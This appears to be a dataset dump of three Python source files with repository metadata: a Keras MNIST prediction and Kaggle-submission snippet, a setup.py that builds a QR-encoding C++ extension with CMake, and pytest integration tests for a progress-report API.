# Fix 1: the original called `test_data.as_matrix()` twice per iteration —
# `.as_matrix()` is deprecated (removed in pandas >= 1.0) and re-converting
# the whole frame each pass made the loop O(n^2); convert once with `.values`.
# Fix 2: store the scalar label instead of the length-1 array returned by
# `predict_classes`, so the submission CSV later contains plain integers.
test_images = test_data.values
ans = []
for img in test_images:
    img = img / 255
    img = np.array(img).reshape((28, 28, 1))
    # Add the batch dimension expected by the model: (1, 28, 28, 1).
    img = np.expand_dims(img, axis=0)
    img_class = model.predict_classes(img)
    ans.append(img_class[0])
# Build the Kaggle submission file; ImageId is 1-based.
ids = [i+1 for i in range(len(ans))]
df_1 = pd.DataFrame({"ImageId" : ids, "Label" : ans})
df_1.to_csv("1.csv", index = False)
#print(classes[0:10])
# Show the prediction for the last test image processed in the loop above.
print(img_class)
#prediction = img_class[0]
classname = img_class[0]
print("Predicted number is: ",classname)
# Reshape back to 2-D for display with matplotlib.
img = img.reshape((28,28))
plt.imshow(img)
plt.title(classname)
plt.show()
| wasi-9274/DL_Directory | DL_Projects/mnist_advanced.py | mnist_advanced.py | py | 2,351 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.random.seed",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.set_random_seed",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pandas.re... |
2710936445 | import os
import shlex
import subprocess
import datetime
import time
import shutil
from setuptools import setup, Extension
cwd = os.path.dirname(os.path.abspath(__file__))
def execute_command(cmdstring, cwd=None, timeout=None, shell=False):
    """Run *cmdstring* as a subprocess and return its exit code.

    Args:
        cmdstring: command line; split with shlex unless *shell* is True.
        cwd: working directory for the child process.
        timeout: seconds to wait before aborting (checked every 0.1s).
        shell: pass the command string through the shell unmodified.

    Raises:
        Exception: if *timeout* elapses before the command finishes.
    """
    if shell:
        cmdstring_list = cmdstring
    else:
        cmdstring_list = shlex.split(cmdstring)
    if timeout:
        end_time = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
    sub = subprocess.Popen(cmdstring_list, cwd=cwd, stdin=subprocess.PIPE,
                           shell=shell, bufsize=4096)
    # Poll until the child exits, enforcing the deadline if one was set.
    while sub.poll() is None:
        time.sleep(0.1)
        if timeout and end_time <= datetime.datetime.now():
            # Bug fix: terminate the timed-out child before raising;
            # previously it was left running (process leak).
            sub.kill()
            sub.wait()
            raise Exception("Timeout: %s" % cmdstring)
    return sub.returncode
def build_library():
    """Configure and build the native library with CMake under ./build."""
    build_dir = os.path.join(cwd, "build")
    # Always start from a clean build tree.
    if os.path.exists(build_dir):
        shutil.rmtree(build_dir)
    # Configure step.
    if execute_command("cmake -S {} -B {}".format(cwd, build_dir)) != 0:
        raise RuntimeError("Run configure command fail.")
    # Build step.
    if execute_command("cmake --build {}".format(build_dir)) != 0:
        raise RuntimeError("Run build Command fail.")
def main():
    """Build the native library, then package the extension via setuptools."""
    build_library()
    # Link the stub module against the library produced in ./build.
    extention = Extension(
        "opqr",
        libraries=["opqr"],
        sources=["stub.cpp"],
        language="c++",
        extra_compile_args=['-std=c++17'],
        include_dirs=[cwd],
        library_dirs=[os.path.join(cwd, "build")]
    )
    setup(name="opqr",
          version="1.1.3",
          long_description="A Simple QR encode Library.",
          description="A Simple QR encode Library.",
          author="caozhanhao",
          author_email="cao2013zh@163.com",
          ext_modules=[extention]
          )
if __name__ == "__main__":
main()
| caozhanhao/opqr-python | setup.py | setup.py | py | 1,983 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "shlex.split",
"line_num... |
24879538563 | import pathlib
from typing import Any, Callable, NamedTuple
import pytest
from fastapi.testclient import TestClient
from starlette import status
from tests.conftest import authenticate, find_username
PROGRESS_REPORT_URL = "/progress"
def _prepare_settings_and_summary(
    proposal_code: str, tmp_path: pathlib.Path, monkeypatch: pytest.MonkeyPatch
) -> None:
    """Point the proposals directory at *tmp_path* and plant a fake summary PDF."""
    class MockSettings(NamedTuple):
        proposals_dir: pathlib.Path

    def mock_get_settings() -> Any:
        return MockSettings(pathlib.Path(tmp_path))

    # Replace the service's settings lookup so it reads from the temp dir.
    monkeypatch.setattr(
        "saltapi.service.proposal_service.get_settings", mock_get_settings
    )
    proposal_dir = mock_get_settings().proposals_dir / proposal_code
    included_dir = proposal_dir / "Included"
    # The included directory must exist as the generated progress report is stored in
    # that directory.
    included_dir.mkdir(parents=True)
    submission_version_dir = proposal_dir / "1"
    submission_version_dir.mkdir(parents=True)
    # Copy the small PDF fixture into place as the submission's summary.
    summary_pdf: pathlib.Path = submission_version_dir / "Summary.pdf"
    fake_summary_pdf = pathlib.Path.cwd() / "tests" / "data" / "summary.pdf"
    summary_pdf.write_bytes(fake_summary_pdf.read_bytes())
def test_submitting_progress_report_is_impossible_with_invalid_percentages(
    client: TestClient,
) -> None:
    """A malformed partner_requested_percentages value must be rejected with 400."""
    proposal_code = "2018-2-SCI-020"
    data = {
        "requested_time": 4200,
        "maximum_seeing": 2,
        "transparency": "Thin cloud",
        "description_of_observing_constraints": 'Thin/thick cloud and 2-3" seeing.',
        "change_reason": "N/A",
        "summary_of_proposal_status": "See attached.",
        "strategy_changes": "None",
        # Not of the expected "PARTNER:percentage;..." form.
        "partner_requested_percentages": "invalid",
    }
    username = find_username("administrator")
    authenticate(username, client)
    response = client.put(
        PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
    )
    assert response.status_code == status.HTTP_400_BAD_REQUEST
def test_submit_progress_report(
    check_data: Callable[[Any], None],
    client: TestClient,
    tmp_path: pathlib.Path,
    monkeypatch: pytest.MonkeyPatch,
) -> None:
    """Submitting a valid progress report succeeds and can be read back."""
    proposal_code = "2018-2-SCI-020"
    _prepare_settings_and_summary(proposal_code, tmp_path, monkeypatch)
    data = {
        "requested_time": 4200,
        "maximum_seeing": 2,
        "transparency": "Thin cloud",
        "description_of_observing_constraints": 'Thin/thick cloud and 2-3" seeing.',
        "change_reason": "N/A",
        "summary_of_proposal_status": "See attached.",
        "strategy_changes": "None",
        "partner_requested_percentages": "RSA:100;UKSC:0;RU:0",
    }
    username = find_username("administrator")
    authenticate(username, client)
    response = client.put(
        PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
    )
    assert response.status_code == status.HTTP_200_OK
    response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
    assert response.status_code == status.HTTP_200_OK
    response_data = response.json()
    # The filename changes with every test run
    del response_data["proposal_progress_pdf"]
    # Compare the remaining payload against the stored regression snapshot.
    check_data(response_data)
def test_submit_progress_report_repeatedly(
    check_data: Callable[[Any], None],
    client: TestClient,
    tmp_path: pathlib.Path,
    monkeypatch: pytest.MonkeyPatch,
) -> None:
    """Resubmitting is idempotent for equal data and updates for changed data."""
    proposal_code = "2018-2-SCI-020"
    _prepare_settings_and_summary(proposal_code, tmp_path, monkeypatch)
    data = {
        "requested_time": 4200,
        "maximum_seeing": 2,
        "transparency": "Thin cloud",
        "description_of_observing_constraints": 'Thin/thick cloud and 2-3" seeing.',
        "change_reason": "N/A",
        "summary_of_proposal_status": "See attached.",
        "strategy_changes": "None",
        "partner_requested_percentages": "RSA:100;UKSC:0;RU:0",
    }
    username = find_username("administrator")
    authenticate(username, client)
    response = client.put(
        PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
    )
    assert response.status_code == status.HTTP_200_OK
    response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
    first_response_data = response.json()
    # The filename changes with every test run
    del first_response_data["proposal_progress_pdf"]
    # Submitting a progress report is idempotent.
    response = client.put(
        PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
    )
    assert response.status_code == status.HTTP_200_OK
    response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
    second_response_data = response.json()
    assert response.status_code == status.HTTP_200_OK
    del second_response_data["proposal_progress_pdf"]
    assert second_response_data == first_response_data
    # Resubmitting with different data updates the request
    updated_data = {
        "requested_time": 11000,
        "maximum_seeing": 3,
        "transparency": "Thick cloud",
        "description_of_observing_constraints": 'Thick cloud and 3" seeing.',
        "change_reason": "Previous data suggests the conditions may be relaxed.",
        "summary_of_proposal_status": "All going well.",
        "strategy_changes": (
            "Relax the observing conditions to increase the observation probability."
        ),
        "partner_requested_percentages": "RSA:33;UKSC:3;RU:64",
    }
    response = client.put(
        PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=updated_data
    )
    assert response.status_code == status.HTTP_200_OK
    response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
    third_response_data = response.json()
    del third_response_data["proposal_progress_pdf"]
    assert response.status_code == status.HTTP_200_OK
    # The updated submission must differ from the first one and match the
    # regression snapshot.
    assert third_response_data != first_response_data
    check_data(third_response_data)
| saltastroops/salt-api | tests/integration/progress_report/test_submit_progress_report.py | test_submit_progress_report.py | py | 5,922 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pytest.MonkeyPatch",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "typing.NamedTuple",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "pathlib.P... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.